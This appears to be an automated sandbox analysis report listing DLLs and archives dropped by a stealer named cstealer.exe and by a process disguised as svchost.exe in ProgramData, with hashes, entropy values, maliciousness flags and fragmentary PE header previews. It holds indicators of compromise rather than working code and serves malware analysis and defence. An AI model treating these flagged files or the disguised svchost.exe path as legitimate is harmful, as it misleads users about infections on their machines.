SHA1:01BCBD134A76CCD4F3BADB5F4056ABEDCFF60734
SHA-256:E662D2B35BB48C5F3432BDE79C0D20313238AF800968BA0FAA6EA7E7E5EF4535
SHA-512:DEDF7F98AFC0A94A248F12E4C4CA01B412DA45B926DA3F9C4CBC1D2CBB98C8899F43F5884B1BF1F0B941EDAEEF65612EA17438E67745962FF13761300910960D
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):251768
Entropy (8bit):6.543870948107038
Encrypted:false
SSDEEP:6144:3JhhPXoWcz5HvcQpq9Sr9pmHboiYE9qWM53pLW1AmXYWtmVS9G:fNXoWcznq9Sr9pyKFh6eS9G
MD5:D47E6ACF09EAD5774D5B471AB3AB96FF
SHA1:64CE9B5D5F07395935DF95D4A0F06760319224A2
SHA-256:D0DF57988A74ACD50B2D261E8B5F2C25DA7B940EC2AAFBEE444C277552421E6E
SHA-512:52E132CE94F21FA253FED4CF1F67E8D4423D8C30224F961296EE9F64E2C9F4F7064D4C8405CD3BB67D3CF880FE4C21AB202FA8CF677E3B4DAD1BE6929DBDA4E2
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):63872
Entropy (8bit):6.166853300594844
Encrypted:false
SSDEEP:1536:18njpHxGkYjEEEJkn8cw6ThID5IJt7SyiPx:GnjpHxRJ8w6ThID5IJtEx
MD5:DE4D104EA13B70C093B07219D2EFF6CB
SHA1:83DAF591C049F977879E5114C5FEA9BBBFA0AD7B
SHA-256:39BC615842A176DB72D4E0558F3CDCAE23AB0623AD132F815D21DCFBFD4B110E
SHA-512:567F703C2E45F13C6107D767597DBA762DC5CAA86024C87E7B28DF2D6C77CD06D3F1F97EED45E6EF127D5346679FEA89AC4DC2C453CE366B6233C0FA68D82692
Malicious:true
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):158080
                                                                                                                                                          Entropy (8bit):6.835761878596918
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:5mGf4k8d79MwyHiRr7tznf49mNoaGjQJplJIDe10Yhx:5Pf4FhMwyMAYOao6P
                                                                                                                                                          MD5:337B0E65A856568778E25660F77BC80A
                                                                                                                                                          SHA1:4D9E921FEAEE5FA70181EBA99054FFA7B6C9BB3F
                                                                                                                                                          SHA-256:613DE58E4A9A80EFF8F8BC45C350A6EAEBF89F85FFD2D7E3B0B266BF0888A60A
                                                                                                                                                          SHA-512:19E6DA02D9D25CCEF06C843B9F429E6B598667270631FEBE99A0D12FC12D5DA4FB242973A8351D3BF169F60D2E17FE821AD692038C793CE69DFB66A42211398E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):31104
                                                                                                                                                          Entropy (8bit):6.35436407327013
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:cQuCvO+MZFryl9SDCg6rXv5mkWsnTBq9ID7UJIYiSy1pCQYIPxh8E9VF0Nyb9:cl+yFp6rXRmk5s9ID7UeYiSyv7PxWER
                                                                                                                                                          MD5:FF8300999335C939FCCE94F2E7F039C0
                                                                                                                                                          SHA1:4FF3A7A9D9CA005B5659B55D8CD064D2EB708B1A
                                                                                                                                                          SHA-256:2F71046891BA279B00B70EB031FE90B379DBE84559CF49CE5D1297EA6BF47A78
                                                                                                                                                          SHA-512:F29B1FD6F52130D69C8BD21A72A71841BF67D54B216FEBCD4E526E81B499B9B48831BB7CDFF0BFF6878AAB542CA05D6326B8A293F2FB4DD95058461C0FD14017
                                                                                                                                                          Malicious:true
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):78200
                                                                                                                                                          Entropy (8bit):6.239347454910878
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:HJlcAdpEVuju9/s+S+pJGQRivVia3i9IDQw17Sy+Px3sxi:H7ce+uju9/sT+pJGdvVp3i9IDQw1kxZ
                                                                                                                                                          MD5:8140BDC5803A4893509F0E39B67158CE
                                                                                                                                                          SHA1:653CC1C82BA6240B0186623724AEC3287E9BC232
                                                                                                                                                          SHA-256:39715EF8D043354F0AB15F62878530A38518FB6192BC48DA6A098498E8D35769
                                                                                                                                                          SHA-512:D0878FEE92E555B15E9F01CE39CFDC3D6122B41CE00EC3A4A7F0F661619F83EC520DCA41E35A1E15650FB34AD238974FE8019577C42CA460DDE76E3891B0E826
                                                                                                                                                          Malicious:true
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):118656
                                                                                                                                                          Entropy (8bit):6.2256831065058815
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:fArVnbGK9SGnh8u6rqMD6ciFCrl14zZvV9NdJRvdO5yt6sqM7VjEP/OsYpxtXr9T:YrVSK9SGnh8u6ESx5CVQP/yXZ
                                                                                                                                                          MD5:D4324D1E8DB7FCF220C5C541FECCE7E3
                                                                                                                                                          SHA1:1CAF5B23AE47F36D797BC6BDD5B75B2488903813
                                                                                                                                                          SHA-256:DDBED9D48B17C54FD3005F5A868DD63CB8F3EFE2C22C1821CEBB2FE72836E446
                                                                                                                                                          SHA-512:71D56D59E019CF42CEA88203D9C6E50F870CD5C4D5C46991ACBFF3AB9FF13F78D5DBF5D1C2112498FC7E279D41EE27DB279B74B4C08A60BB4098F9E8C296B5D8
                                                                                                                                                          Malicious:true
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):159616
                                                                                                                                                          Entropy (8bit):5.9948013841482926
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:qFrIQQey4VWR98w/PQQcXo8uOVrGxn+SQOXLkd1ItS+Q8YuAfxJIDt75EHx:eEeRV29//4QcJuOynyvxX
                                                                                                                                                          MD5:069BCCC9F31F57616E88C92650589BDD
                                                                                                                                                          SHA1:050FC5CCD92AF4FBB3047BE40202D062F9958E57
                                                                                                                                                          SHA-256:CB42E8598E3FA53EEEBF63F2AF1730B9EC64614BDA276AB2CD1F1C196B3D7E32
                                                                                                                                                          SHA-512:0E5513FBE42987C658DBA13DA737C547FF0B8006AECF538C2F5CF731C54DE83E26889BE62E5C8A10D2C91D5ADA4D64015B640DAB13130039A5A8A5AB33A723DC
                                                                                                                                                          Malicious:true
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1439447
                                                                                                                                                          Entropy (8bit):5.58639468240011
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:6QRqL5TPAxNWlUKdcubgAnj90H0AWfh7dYMbP/Medfw:6QRqL2xNbeA
                                                                                                                                                          MD5:83D235E1F5B0EE5B0282B5AB7244F6C4
                                                                                                                                                          SHA1:629A1CE71314D7ABBCE96674A1DDF9F38C4A5E9C
                                                                                                                                                          SHA-256:DB389A9E14BFAC6EE5CCE17D41F9637D3FF8B702CC74102DB8643E78659670A0
                                                                                                                                                          SHA-512:77364AFF24CFC75EE32E50973B7D589B4A896D634305D965ECBC31A9E0097E270499DBEC93126092EB11F3F1AD97692DB6CA5927D3D02F3D053336D6267D7E5F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):292541
                                                                                                                                                          Entropy (8bit):6.048162209044241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5NF:QWb/TRJLWURrI55MWavdF0D
                                                                                                                                                          MD5:D3E74C9D33719C8AB162BAA4AE743B27
                                                                                                                                                          SHA1:EE32F2CCD4BC56CA68441A02BF33E32DC6205C2B
                                                                                                                                                          SHA-256:7A347CA8FEF6E29F82B6E4785355A6635C17FA755E0940F65F15AA8FC7BD7F92
                                                                                                                                                          SHA-512:E0FB35D6901A6DEBBF48A0655E2AA1040700EB5166E732AE2617E89EF5E6869E8DDD5C7875FA83F31D447D4ABC3DB14BFFD29600C9AF725D9B03F03363469B4C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10752
                                                                                                                                                          Entropy (8bit):4.673454313041419
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:KG+p72HzA5iJGhU2Y0hQMsQJCUCLsZEA4elh3XQMtCFliHUWQcX6g8cim1qeSju1:A2HzzU2bRYoeLHkcqgvimoe
                                                                                                                                                          MD5:723EC2E1404AE1047C3EF860B9840C29
                                                                                                                                                          SHA1:8FC869B92863FB6D2758019DD01EDBEF2A9A100A
                                                                                                                                                          SHA-256:790A11AA270523C2EFA6021CE4F994C3C5A67E8EAAAF02074D5308420B68BD94
                                                                                                                                                          SHA-512:2E323AE5B816ADDE7AAA14398F1FDB3EFE15A19DF3735A604A7DB6CADC22B753046EAB242E0F1FBCD3310A8FBB59FF49865827D242BAF21F44FD994C3AC9A878
                                                                                                                                                          Malicious:true
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):119296
                                                                                                                                                          Entropy (8bit):5.872097486056729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:OzgMw0g+m/+rxC9Jtd960WsCyqPD1/bZMlDML48Be9zGTVmZRJIRbvB:OsTH+VC9Jtd9VdCr7fMp/8yGTVmzmZ
                                                                                                                                                          MD5:9EA8098D31ADB0F9D928759BDCA39819
                                                                                                                                                          SHA1:E309C85C1C8E6CE049EEA1F39BEE654B9F98D7C5
                                                                                                                                                          SHA-256:3D9893AA79EFD13D81FCD614E9EF5FB6AAD90569BEEDED5112DE5ED5AC3CF753
                                                                                                                                                          SHA-512:86AF770F61C94DFBF074BCC4B11932BBA2511CAA83C223780112BDA4FFB7986270DC2649D4D3EA78614DBCE6F7468C8983A34966FC3F2DE53055AC6B5059A707
                                                                                                                                                          Malicious:true
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3441504
                                                                                                                                                          Entropy (8bit):6.097985120800337
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:8TKuk2CQIU6iV9OjPWgBqIVRIaEv5LY/RnQ2ETEvrPnkbsYNPsNwsML1CPwDv3u6:Vv+KRi5KsEKsY+NwsG1CPwDv3uFfJu
                                                                                                                                                          MD5:6F4B8EB45A965372156086201207C81F
                                                                                                                                                          SHA1:8278F9539463F0A45009287F0516098CB7A15406
                                                                                                                                                          SHA-256:976CE72EFD0A8AEEB6E21AD441AA9138434314EA07F777432205947CDB149541
                                                                                                                                                          SHA-512:2C5C54842ABA9C82FB9E7594AE9E264AC3CBDC2CC1CD22263E9D77479B93636799D0F28235AC79937070E40B04A097C3EA3B7E0CD4376A95ED8CA90245B7891F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... ..$...................................................4....../5...`..........................................h/..h...*4.@....`4.|....`2.....Z4.`)...p4..O....,.8...........................`.,.@............ 4..............................text.....$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata.......`2.......1.............@..@.idata..^#... 4..$....3.............@..@.00cfg..u....P4.......3.............@..@.rsrc...|....`4.......3.............@..@.reloc...x...p4..z....3.............@..B................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):35064
                                                                                                                                                          Entropy (8bit):6.362215445656998
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:SB8J4ihYfwYiXGPc9orPji8i4DDQWvGaRQsTeCXS/Fzc7jsFruRXYV1ZE9DRCXjQ:rGHs4vpegQsTT0uj82S7Fp2DG4yshH
                                                                                                                                                          MD5:32D36D2B0719DB2B739AF803C5E1C2F5
                                                                                                                                                          SHA1:023C4F1159A2A05420F68DAF939B9AC2B04AB082
                                                                                                                                                          SHA-256:128A583E821E52B595EB4B3DDA17697D3CA456EE72945F7ECCE48EDEDAD0E93C
                                                                                                                                                          SHA-512:A0A68CFC2F96CB1AFD29DB185C940E9838B6D097D2591B0A2E66830DD500E8B9538D170125A00EE8C22B8251181B73518B73DE94BEEEDD421D3E888564A111C1
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X................d.....N...................5...N......N......N....................................Rich............................PE..d....$(a.........." .....H...*.......L..............................................4.....`..........................................l.......o..P...............8....l..........(....b...............................c..8............`.. ............................text....G.......H.................. ..`.rdata..X....`.......L..............@..@.data................b..............@....pdata..8............d..............@..@.reloc..(............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):702816
                                                                                                                                                          Entropy (8bit):5.547832370836076
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:UUnBMlBGdU/t0voUYHgqRJd7a7+JLvrfX7bOI8Fp0D6WuHU2lvzR:UN/t0vMnffOI8Fp0D6TU2lvzR
                                                                                                                                                          MD5:8769ADAFCA3A6FC6EF26F01FD31AFA84
                                                                                                                                                          SHA1:38BAEF74BDD2E941CCD321F91BFD49DACC6A3CB6
                                                                                                                                                          SHA-256:2AEBB73530D21A2273692A5A3D57235B770DAF1C35F60C74E01754A5DAC05071
                                                                                                                                                          SHA-512:FAC22F1A2FFBFB4789BDEED476C8DAF42547D40EFE3E11B41FADBC4445BB7CA77675A31B5337DF55FDEB4D2739E0FB2CBCAC2FEABFD4CD48201F8AE50A9BD90B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p*..p*..p*......p*...+..p*.\.+..p*.../..p*......p*...)..p*...+..p*..p+.iq*......p*...*..p*.....p*...(..p*.Rich.p*.........PE..d......b.........." ... .B...T......<.....................................................`.........................................@A...N..@U..........s........M......`)......h...0...8...............................@............@..@............................text....@.......B.................. ..`.rdata..J/...`...0...F..............@..@.data...AM.......D...v..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............j..............@..@.rsrc...s............l..............@..@.reloc..l............t..............@..B................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5758328
                                                                                                                                                          Entropy (8bit):6.089726305084683
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:JdHwQkq3AAtsPv3XXTVEspHBMp4SsPxQpe2bx:JdHwQkq3AMsPvHXSpAxQpe2V
                                                                                                                                                          MD5:9A24C8C35E4AC4B1597124C1DCBEBE0F
                                                                                                                                                          SHA1:F59782A4923A30118B97E01A7F8DB69B92D8382A
                                                                                                                                                          SHA-256:A0CF640E756875C25C12B4A38BA5F2772E8E512036E2AC59EB8567BF05FFBFB7
                                                                                                                                                          SHA-512:9D9336BF1F0D3BC9CE4A636A5F4E52C5F9487F51F00614FC4A34854A315CE7EA8BE328153812DBD67C45C75001818FA63317EBA15A6C9A024FA9F2CAB163165B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih.-...-...-...r../...r@.#...r..!...r..%...r..)...$q..7....{..&...-...H...r......r..,...rB.,...r..,...Rich-...........PE..d...R.Vc.........." ...!.T%..,7......K........................................\......~X...`.........................................P.@......NA......`[.......V../....W.x)...p[..B....).T...........................P.).@............p%..............................text...BS%......T%................. ..`.rdata..0....p%......X%.............@..@.data.........A..N...\A.............@....pdata.../....V..0....Q.............@..@PyRuntim......X.......S.............@....rsrc........`[......fV.............@..@.reloc...B...p[..D...pV.............@..B........................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):29056
                                                                                                                                                          Entropy (8bit):6.49468173344972
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:5oR1ecReJKwHqUuI7A70RUZ9ID7GvIYiSy1pCQlIJNPxh8E9VF0NyUT2:ezeUeJlHqybG9ID7GQYiSyvCPxWEC
                                                                                                                                                          MD5:97EE623F1217A7B4B7DE5769B7B665D6
                                                                                                                                                          SHA1:95B918F3F4C057FB9C878C8CC5E502C0BD9E54C0
                                                                                                                                                          SHA-256:0046EB32F873CDE62CF29AF02687B1DD43154E9FD10E0AA3D8353D3DEBB38790
                                                                                                                                                          SHA-512:20EDC7EAE5C0709AF5C792F04A8A633D416DA5A38FC69BD0409AFE40B7FB1AFA526DE6FE25D8543ECE9EA44FD6BAA04A9D316AC71212AE9638BDEF768E661E0F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.t^_f'^_f'^_f'W'.'\_f'.$g&\_f'.$c&R_f'.$b&V_f'.$e&Z_f'.$g&\_f'^_g'._f'.-g&[_f'.$k&__f'.$f&__f'.$.'__f'.$d&__f'Rich^_f'........PE..d...e.Vc.........." ...!.....2............................................................`..........................................@..L...,A..x....p.......`.......H...)......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1481088
                                                                                                                                                          Entropy (8bit):6.569811736013214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:GjhOK/D8n/vDz5YZ/9T6F2MkEvTPdZklaOPSwfzDJ8CVjBx+Xt4V9zQXeRxd:IX/CDzGZ1T01TPPk76oDJ8qKXavzQOR
                                                                                                                                                          MD5:AC633A9EB00F3B165DA1181A88BB2BDA
                                                                                                                                                          SHA1:D8C058A4F873FAA6D983E9A5A73A218426EA2E16
                                                                                                                                                          SHA-256:8D58DB3067899C997C2DB13BAF13CD4136F3072874B3CA1F375937E37E33D800
                                                                                                                                                          SHA-512:4BF6A3AAFF66AE9BF6BC8E0DCD77B685F68532B05D8F4D18AAA7636743712BE65AB7565C9A5C513D5EB476118239FB648084E18B4EF1A123528947E68BD00A97
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<T.S]:.S]:.S]:.Z%.._]:..&;.Q]:..&?.^]:..&>.[]:..&9.W]:../;.P]:.S];..]:..&2.R]:..&:.R]:..&.R]:..&8.R]:.RichS]:.........................PE..d.....Vc.........." ...!.................................................................`..........................................1..L"..LS..................\....p...)..........`...T........................... ...@...............(............................text............................... ..`.rdata..............................@..@.data....G...p...>...H..............@....pdata..\...........................@..@.rsrc................X..............@..@.reloc...............b..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1138040
                                                                                                                                                          Entropy (8bit):5.434701276929729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:JbYefjwR6nbJonRiPDjRrO518BEPYPx++ZiLKGZ5KXyVH4eDS0E:tYeMQ0IDJc+EwPgPOG6Xyd46S0E
                                                                                                                                                          MD5:BC58EB17A9C2E48E97A12174818D969D
                                                                                                                                                          SHA1:11949EBC05D24AB39D86193B6B6FCFF3E4733CFD
                                                                                                                                                          SHA-256:ECF7836AA0D36B5880EB6F799EC402B1F2E999F78BFFF6FB9A942D1D8D0B9BAA
                                                                                                                                                          SHA-512:4AA2B2CE3EB47503B48F6A888162A527834A6C04D3B49C562983B4D5AAD9B7363D57AEF2E17FE6412B89A9A3B37FB62A4ADE4AFC90016E2759638A17B1DEAE6C
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...k.Vc.........." ...!.>.......... *...................................................`.............................................X...(........`.......P.......4..x)...p......@]..T............................\..@............P..x............................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....0......................@....pdata.......P......."..............@..@.rsrc........`.......(..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98224
                                                                                                                                                          Entropy (8bit):6.452201564717313
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                                                                                                          MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                                                                                                          SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                                                                                                          SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                                                                                                          SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):820736
                                                                                                                                                          Entropy (8bit):6.056282443190043
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:tY0Uu7wLsglBv4i5DGAqXMAHhlyL82XTw05nmZfRFo:tp0NA1tAmZfR
                                                                                                                                                          MD5:EE3D454883556A68920CAAEDEFBC1F83
                                                                                                                                                          SHA1:45B4D62A6E7DB022E52C6159EEF17E9D58BEC858
                                                                                                                                                          SHA-256:791E7195D7DF47A21466868F3D7386CFF13F16C51FCD0350BF4028E96278DFF1
                                                                                                                                                          SHA-512:E404ADF831076D27680CC38D3879AF660A96AFC8B8E22FFD01647248C601F3C6C4585D7D7DC6BBD187660595F6A48F504792106869D329AA1A0F3707D7F777C6
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.r.q...q...q...x...y......s...:...s......|......y......r.....r...q...L.....Q.....p.....p.....p...Richq...........PE..d... ..d.........." ...#.@...H.......F....................................................`.........................................@c..`....c.......................................9..............................P8..@............P...............................text....?.......@.................. ..`.rdata.......P.......D..............@..@.data........p.......`..............@....pdata...............h..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):83736
                                                                                                                                                          Entropy (8bit):6.595094797707322
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:hXOz78ZqjUyAsIi7W/5+D8W35mjZm35ILCVM7SyfYPxe:pOzwpyAFi7WMgW34jZm35ILCVMZoxe
                                                                                                                                                          MD5:86D1B2A9070CD7D52124126A357FF067
                                                                                                                                                          SHA1:18E30446FE51CED706F62C3544A8C8FDC08DE503
                                                                                                                                                          SHA-256:62173A8FADD4BF4DD71AB89EA718754AA31620244372F0C5BBBAE102E641A60E
                                                                                                                                                          SHA-512:7DB4B7E0C518A02AE901F4B24E3860122ACC67E38E73F98F993FE99EB20BB3AA539DB1ED40E63D6021861B54F34A5F5A364907FFD7DA182ADEA68BBDD5C2B535
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .........\..............................................P............`......................................... ...H...h........0....... ..,......../...@......`...T...............................8............................................text.............................. ..`.rdata...=.......>..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):181248
                                                                                                                                                          Entropy (8bit):6.188683787528254
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:rZ1fKD8GVLHASq0TTjfQxnkVB0hcspEsHS7iiSTLkKetJb9Pu:rZNRGVb9TTCnaZsuMXiSTLLeD9
                                                                                                                                                          MD5:EBB660902937073EC9695CE08900B13D
                                                                                                                                                          SHA1:881537ACEAD160E63FE6BA8F2316A2FBBB5CB311
                                                                                                                                                          SHA-256:52E5A0C3CA9B0D4FC67243BD8492F5C305FF1653E8D956A2A3D9D36AF0A3E4FD
                                                                                                                                                          SHA-512:19D5000EF6E473D2F533603AFE8D50891F81422C59AE03BEAD580412EC756723DC3379310E20CD0C39E9683CE7C5204791012E1B6B73996EA5CB59E8D371DE24
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih..-..C-..C-..C$qMC!..C.|.B/..CKf#C)..C.|.B&..C.|.B%..C.|.B)..Cfq.B)..C.|.B...C-..C...C.|.B)..C$qKC,..C.|.B,..C.|!C,..C.|.B,..CRich-..C........PE..d.....e.........." .........@...............................................0............`..........................................g..l...|g..................H............ .......M...............................M..8............................................text...h........................... ..`.rdata..l...........................@..@.data....\.......0...v..............@....pdata..H...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):123672
                                                                                                                                                          Entropy (8bit):6.047035801914277
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:0OEESRiaiH6lU1vxqfrId0sx3gVILLPykxA:hj+I1vAfrIRx3gN
                                                                                                                                                          MD5:1635A0C5A72DF5AE64072CBB0065AEBE
                                                                                                                                                          SHA1:C975865208B3369E71E3464BBCC87B65718B2B1F
                                                                                                                                                          SHA-256:1EA3DD3DF393FA9B27BF6595BE4AC859064CD8EF9908A12378A6021BBA1CB177
